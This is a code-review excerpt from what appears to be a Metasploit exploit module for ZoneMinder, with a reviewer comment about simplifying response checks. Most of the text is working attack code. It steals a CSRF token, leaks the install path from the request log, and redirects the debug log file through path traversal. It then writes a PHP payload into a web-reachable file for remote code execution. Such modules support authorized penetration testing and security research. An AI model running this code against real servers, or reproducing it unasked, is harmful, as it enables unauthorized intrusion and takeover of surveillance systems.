modules/exploits/unix/webapp/zoneminder_lang_exec.rb

```diff
@@ -0,0 +1,233 @@
+    )
+
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, '/index.php'),
+      'method' => 'GET',
+      'keep_cookies' => true,
+      'vars_get' => { 'view' => 'options' }
+    )
+    csrf_magic = get_csrf_magic(res)
+    fail_with(Failure::UnexpectedReply, 'Unable to get current language') if res.nil?
+    current_lang = res.get_html_document.at(
+      'select[@name="newConfig[ZM_LANG_DEFAULT]"]
+        option[@selected="selected"]'
+    ).text
+
+    data = 'view=request&request=log&task=query&limit=10'
+    data += "&__csrf_magic=#{csrf_magic}" if csrf_magic
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, '/index.php'),
+      'data' => data.to_s,
+      'keep_cookies' => true
+    )
+
+    unless res['content-type'] == 'application/json'
+      fail_with(Failure::UnexpectedReply, 'Unable to get valid JSON response')
+    end
+    fail_with(Failure::UnexpectedReply, 'Unable to get valid JSON response') if res.nil? || res&.body.blank?
+
+    res.body.match(/(\{"result":.*})/)
+    request_log = JSON.parse(Regexp.last_match(1)).with_indifferent_access
+    if request_log.key?(:rows) # Check for latest version key first v1.36.x
+      request_log_key = 'rows'
+    elsif request_log.key?(:logs)
+      request_log_key = 'logs'
+    else
+      fail_with(Failure::UnexpectedReply, 'Service found, but unable to find request log key')
+    end
+
+    request_log = request_log[request_log_key].select { |e| e['Message'] =~ /'#{random_path}'/ }.first
+    if request_log
+      path = request_log['File'].split('/')[0..-2].join('/')
+      vprint_good("Path: #{path}")
+    else
+      fail_with(Failure::UnexpectedReply, 'Service found, but unable to leak installation directory path')
+    end
+
+    fname = "#{rand_text_alphanumeric(6..15)}.php"
+    traverse_path = "#{path}/lang".split('/')[1..].map { '../' }.join
+    shell = traverse_path + "tmp/#{fname}"
+    data = "view=options&tab=logging&action=options&newConfig[ZM_LOG_DEBUG]=1&newConfig[ZM_LOG_DEBUG_FILE]=#{shell}"
+    data += "&__csrf_magic=#{csrf_magic}" if csrf_magic
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, '/index.php'),
+      'data' => data.to_s,
+      'keep_cookies' => true
+    )
+    vprint_good("Shell: #{shell}")
+    fail_with(Failure::UnexpectedReply, 'Unable to set LOG_DEBUG_FILE option') if res.nil? || res&.code != 302
+
+    p = %(<?php #{payload.encoded} ?>)
+    data = "view=request&request=log&task=create&level=ERR&message=#{p}&file=#{shell}"
+    data += "&__csrf_magic=#{csrf_magic}" if csrf_magic
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, '/index.php'),
+      'data' => data.to_s,
+      'keep_cookies' => true
+    )
+    unless res['content-type'] == 'application/json'
+      fail_with(Failure::UnexpectedReply, 'Unable to get valid JSON response')
+    end
```

Comment:
Just a `fail_with()` call if res is `nil` or `empty` is enough to check for a valid response

```suggestion
```